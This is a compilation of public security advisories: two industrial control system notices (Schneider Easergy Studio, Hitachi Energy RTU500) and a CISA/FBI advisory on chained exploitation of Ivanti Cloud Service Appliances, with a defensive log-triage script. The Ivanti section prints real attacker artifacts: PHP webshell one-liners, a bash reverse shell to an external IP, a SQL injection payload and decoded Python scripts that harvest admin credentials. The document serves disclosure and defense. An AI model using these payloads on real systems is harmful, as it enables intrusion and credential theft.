Schneider Electric Easergy Studio

1. EXECUTIVE SUMMARY

  • CVSS v3 7.8
  • ATTENTION: Low attack complexity
  • Vendor: Schneider Electric
  • Equipment: Easergy Studio
  • Vulnerability: Improper Privilege Management

2. RISK EVALUATION
Successful exploitation of this vulnerability may risk unauthorized access to the installation directory for Easergy Studio, which could allow an attacker with access to the file system to elevate privileges.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Schneider Electric reports that the following Easergy Studio products are affected:

  • Easergy Studio: Versions 9.3.1 and prior

3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPER PRIVILEGE MANAGEMENT CWE-269
An improper privilege management vulnerability exists that could cause unauthorized access, loss of confidentiality, integrity, and availability of the workstation when a non-administrative authenticated user tries to perform privilege escalation by tampering with the binaries.
CVE-2024-9002 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Commercial Facilities, Energy, Healthcare and Public Health, Information Technology, Transportation Systems
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: France

3.4 RESEARCHER
Charit Misra (Applied Risk B.V. (a DNV Company)) reported this vulnerability to Schneider Electric.
4. MITIGATIONS
Version 9.3.4 and later of Easergy Studio include a fix for this vulnerability. The fix was released in December 2022, and Schneider Electric recommends that users install the latest version available: https://www.se.com/ww/en/download/document/Easergy_Studio_Installer/
Schneider Electric strongly recommends the following industry cybersecurity best practices:

  • Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
  • Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
  • Place all controllers in locked cabinets and never leave them in the “Program” mode.
  • Never connect programming software to any network other than the network intended for that device.
  • Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
  • Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
  • Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
  • When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.

For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document and the associated Schneider Electric Security Notification SEVD-2024-282-03 in PDF and CSAF.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

  • Do not click web links or open attachments in unsolicited email messages.
  • Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  • Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
5. UPDATE HISTORY

  • January 23, 2025: Initial Publication

Hitachi Energy RTU500 Series Product

1. EXECUTIVE SUMMARY

  • CVSS v3 7.2
  • ATTENTION: Exploitable remotely/low attack complexity
  • Vendor: Hitachi Energy
  • Equipment: RTU500 series products
  • Vulnerability: Improperly Implemented Security Check for Standard

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to update the RTU500 with unsigned firmware.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Hitachi Energy reports that the following RTU500 series products are affected:

  • RTU500 series CMU Firmware: Version 13.5.1 up to and including 13.5.3
  • RTU500 series CMU Firmware: Version 13.4.1 up to and including 13.4.4
  • RTU500 series CMU Firmware: Version 13.2.1 up to and including 13.2.7

3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPERLY IMPLEMENTED SECURITY CHECK FOR STANDARD CWE-358
A vulnerability exists in the RTU500 that allows for authenticated and authorized users to bypass secure update. If a malicious actor successfully exploits this vulnerability, they could use it to update the RTU500 with unsigned firmware.
CVE-2024-2617 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Energy
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Switzerland

3.4 RESEARCHER
Hitachi Energy received information about this vulnerability through responsible disclosure.
4. MITIGATIONS
Hitachi Energy recommends that users update to CMU firmware version 13.6.1 and enable the secure update feature on all CMUs of an RTU500.
Hitachi Energy recommends that users implement recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
For more information, see Hitachi Energy Cybersecurity Advisory “Secure Update Bypass Vulnerability in Hitachi Energy’s RTU500 series Product”.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:

  • Do not click web links or open attachments in unsolicited email messages.
  • Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
  • Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.
5. UPDATE HISTORY

  • January 23, 2025: Initial Publication

CISA and FBI Release Advisory on How Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

CISA, in partnership with the Federal Bureau of Investigation (FBI), released Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications. This advisory was crafted in response to active exploitation of vulnerabilities—CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities—in Ivanti Cloud Service Appliances (CSA) in September 2024.
CISA, drawing on trusted third-party incident response data, found that threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks.
CISA and FBI strongly encourage network administrators and defenders to upgrade to the latest supported version of Ivanti CSA and to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) provided in the advisory. All members of the cybersecurity community are also encouraged to visit CISA’s Known Exploited Vulnerabilities Catalog to help better manage vulnerabilities and keep pace with threat activity. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE-2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.
According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.
All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]
Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.
Download the PDF version of this report: AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications (PDF, 756.92 KB)

For a downloadable copy of IOCs, see: AA25-022A STIX XML (XML, 105.56 KB) and AA25-022A STIX JSON (JSON, 76.91 KB)

Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

  • CVE-2024-8963 [CWE-22: Path Traversal] is an administrative bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victim’s network and execute arbitrary commands on the appliance [T1219].[2][3]
  • CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
  • CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.
According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.
Exploit Chain 1
The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.
In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression php\w{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.
After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].
In one confirmed compromise, the threat actors tried to create webshells using two different paths:

echo "<?php system(@$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
echo "<?php system('/bin/sudo '. @$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.
In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.
Lateral Movement
In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].
Exploit Chain 2
In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.
After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES (”’echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k”’, NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.
After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.
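The request patterns described for both exploit chains (the index.php%3F.php traversal segment from CVE-2024-8963, the GET-then-POST sequence against datetime.php and broker.php, and the LOCKOUTATTEMPTS SQL injection body) can be turned into a simple log triage check. The following is an added example written for this page, not code from the advisory or from Ivanti; it assumes a constructed Apache-style access log with an extra trailing quoted field holding the POST body (the real CSA log format is not assumed here), and the source addresses are documentation ranges, not the advisory's IOCs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (hypothetical; not taken from the advisory). Format
# assumed: combined-log prefix plus an optional trailing quoted POST body.
SAMPLE_LOG = """\
203.0.113.10 - - [04/Sep/2024:10:00:01 +0000] "GET /client/index.php%3F.php/gsb/datetime.php HTTP/1.1" 200 512
203.0.113.10 - - [04/Sep/2024:10:00:03 +0000] "POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1" 200 87 "TIMEZONE=<redacted>"
198.51.100.7 - - [04/Sep/2024:10:05:00 +0000] "GET /client/index.php%3f.php/gsb/broker.php HTTP/1.1" 200 610
198.51.100.7 - - [04/Sep/2024:10:05:02 +0000] "POST /client/index.php%3f.php/gsb/broker.php HTTP/1.1" 200 45 "LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES (...)"
192.0.2.44 - - [04/Sep/2024:10:30:00 +0000] "GET /client/index.php HTTP/1.1" 200 2048
192.0.2.44 - - [04/Sep/2024:11:00:00 +0000] "POST /gsb/datetime.php HTTP/1.1" 200 87 "TIMEZONE=Europe/Paris"
"""

# The "%3F.php/" (or "%3f.php/") segment after client/index.php is the
# CVE-2024-8963 traversal that reaches the gsb/*.php pages unauthenticated.
TRAVERSAL_RE = re.compile(r"/client/index\.php%3[fF]\.php/")
# Endpoints the two chains abused: datetime.php and reports.php (chain 1),
# broker.php (chain 2).
ABUSED_ENDPOINTS = ("/gsb/datetime.php", "/gsb/reports.php", "/gsb/broker.php")
# Marker of the chain-2 payload: a second statement inserting into user_info.
SQLI_RE = re.compile(r"INSERT\s+INTO\s+user_info", re.IGNORECASE)
# A GET followed by a POST to the same abused endpoint from the same source
# inside this window matches the "acquire tokens, then execute" sequence.
WINDOW = timedelta(seconds=10)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<body>[^"]*)")?'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["body"] = rec["body"] or ""
    return rec


def analyze(lines):
    """Scan log lines and return (source_ip, finding_kind, detail) tuples."""
    findings = []
    last_get = {}  # (ip, endpoint) -> timestamp of the most recent GET
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these
        path = rec["path"]
        if TRAVERSAL_RE.search(path):
            findings.append((rec["ip"], "traversal", path))
        endpoint = next((e for e in ABUSED_ENDPOINTS if path.lower().endswith(e)), None)
        if endpoint is None:
            continue
        key = (rec["ip"], endpoint)
        if rec["method"] == "GET":
            last_get[key] = rec["ts"]
        elif rec["method"] == "POST":
            prior = last_get.get(key)
            if prior is not None and rec["ts"] - prior <= WINDOW:
                findings.append((rec["ip"], "get-then-post", endpoint))
            if endpoint == "/gsb/broker.php" and SQLI_RE.search(rec["body"]):
                findings.append((rec["ip"], "sqli", endpoint))
    return findings


def summarize(findings):
    """Count findings by kind, e.g. {'traversal': 4, 'get-then-post': 2, 'sqli': 1}."""
    counts = {}
    for _ip, kind, _detail in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


def run_sample():
    """Analyze the constructed sample log above."""
    return analyze(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, kind, detail in run_sample():
        print(f"{ip:15} {kind:14} {detail}")
    print(summarize(run_sample()))
```

The lone admin POST from 192.0.2.44 with no traversal segment and no preceding GET produces no finding, which is the point of combining the three signals rather than alerting on any datetime.php request.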
Detection of Activity
According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.
Victim Organization 1
The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.
Victim Organization 2
This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.
Victim Organization 3
This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.
Indicators of Compromise
See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.
Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

MITRE ATT&CK Tactics and Techniques
See Table 4 to Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Reconnaissance

Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | Threat actors performed reconnaissance by using Obelisk and GoGo to scan for vulnerabilities.

Table 5: Initial Access

Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | Threat actors exploited weaknesses in applications that do not properly handle input to compromise network device protocols, perform SQL injection, and generally exploit applications.

Table 6: Execution

Technique Title | ID | Use
Command and Scripting Interpreter | T1059 | Threat actors abused command and script interpreters to execute commands, scripts, or binaries.

Table 7: Persistence

Technique Title | ID | Use
Modify Authentication Process | T1556 | Threat actors bypassed authentication by exploiting the authentication mechanisms of a device to gain access to organizations’ networks.
Server Software Component: Web Shell | T1505.003 | Threat actors executed code to implant webshells for persistence.

Table 8: Privilege Escalation

Technique Title | ID | Use
Exploitation for Privilege Escalation | T1068 | Threat actors exploited weaknesses in an outdated, vulnerable version of a server to gain elevated access.

Table 9: Defense Evasion

Technique Title | ID | Use
Hide Artifacts: Hidden Users | T1564.002 | Threat actors acted as a hidden user to disguise their presence on a system.
Deobfuscate/Decode Files or Information | T1140 | Threat actors decrypted credentials prior to exfiltration by using native tools located in the extracted backup file.
Abuse Elevation Control Mechanism: Sudo and Sudo Caching | T1548.003 | Threat actors used sudo commands to disable vulnerabilities, modify and remove webshells, and remove evidence of exploitation.

Table 10: Credential Access

Technique Title | ID | Use
Unsecured Credentials: Credentials in Files | T1552.001 | Threat actors harvested encrypted admin credentials to gain further access.

Table 11: Lateral Movement

Technique Title | ID | Use
Exploitation of Remote Services | T1210 | Threat actors exploited CSAs via remote services to gain access to an organization’s networks by leveraging programming errors, EOL systems, and operating systems.

Table 12: Command and Control

Technique Title | ID | Use
Remote Access Software | T1219 | Threat actors attempted to remotely authenticate into a victim’s network and execute arbitrary commands on the appliance.
Application Layer Protocol: Web Protocols | T1071.001 | Threat actors used HTTP GET and POST requests to acquire session and CSRF tokens.

Table 13: Exfiltration

Technique Title | ID | Use
Exfiltration | TA0010 | Threat actors exfiltrated encrypted admin credentials or other encrypted data for future use.

Incident Response
If compromise is detected, the authoring agencies recommend that organizations:

Quarantine or take offline potentially affected hosts.
Reimage compromised hosts.
Provision new account credentials.
For Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, assume that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol (LDAP) and AD.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Removing malicious administrator accounts may not fully mitigate risk, because threat actors may have established additional persistence mechanisms.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Mitigations
CISA and FBI recommend organizations: 

Upgrade to the latest supported version of Ivanti CSA immediately for continued support.[3] Please note that Ivanti CSA 4.6 is EOL and no longer receives patches or third-party libraries. Customers must upgrade to the latest version of the product for continued support.
Install endpoint detection and response (EDR) on the system to alert network defenders on unusual and potentially malicious activity.
Establish a baseline and maintain detailed logs of network traffic, account behavior, and software. This can assist network defenders in identifying anomalies that may indicate malicious activity more quickly.
Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
Secure remote access tools by:

Implementing application controls to manage and control software execution, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.

Strictly limit the use of remote desktop protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:

Audit the network for systems using RDP.
Close unused RDP ports.
Enforce account lockouts after a specified number of attempts.
Apply phishing-resistant multifactor authentication (MFA).
Log RDP login attempts.

Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, CISA and FBI also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

Validate Security Controls
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:

Select an ATT&CK technique described in this advisory (see Table 4 through Table 13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
References

Ivanti: Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)
Ivanti: Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)
Ivanti: Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)
Fortinet: Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA

Contact Information
Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:

CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.

Disclaimer
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
Version History
January 22, 2025: Initial version.
Appendix A: Encoded and Decoded Scripts
Decoded Python Scripts

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

{import os, re, base64, timeos.chdir(“/tmp”)d = “/backups”def set_msg(p, t=”, m=”):   if t and m:       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())   else:       msg = ”   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’service'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))try:   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)except:   r = Nonewith open(“/opt/landesk/broker/broker.conf”) as f:   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]if r:   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’service’\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)   os.system(“tar zxvf {}”.format(r))   while True:       for f in os.listdir(‘.’):           if re.match(“phpw{6}”, f):               os.chmod(f, 0o777)               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()               if m:                   set_msg(dbpwd, “PASSWORD”, m)                   time.sleep(30)                   set_msg(dbpwd)                   exit()else:   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)}

